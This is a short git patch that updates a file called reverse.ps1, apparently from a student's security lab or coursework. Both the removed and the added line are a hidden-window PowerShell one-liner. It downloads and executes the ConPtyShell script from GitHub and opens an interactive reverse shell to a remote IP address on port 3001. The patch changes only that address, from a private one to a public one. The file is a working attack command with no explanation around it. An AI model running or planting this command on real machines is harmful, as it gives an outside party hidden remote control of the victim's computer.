From 3b49086b045d5a768c09bf641c63ff3ef7a67778 Mon Sep 17 00:00:00 2001
From: andreas nyberget <andrnybe@stud.ntnu.no>
Date: Wed, 8 Feb 2023 10:36:52 +0000
Subject: [PATCH] Update reverse.ps1

---
 reverse.ps1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/reverse.ps1 b/reverse.ps1
index 3ff0107..2d737ab 100644
--- a/reverse.ps1
+++ b/reverse.ps1
@@ -1 +1 @@
-PowerShell.exe -WindowStyle hidden {IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 172.25.143.163 3001}
+PowerShell.exe -WindowStyle hidden {IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 143.42.58.77 3001}
-- 
GitLab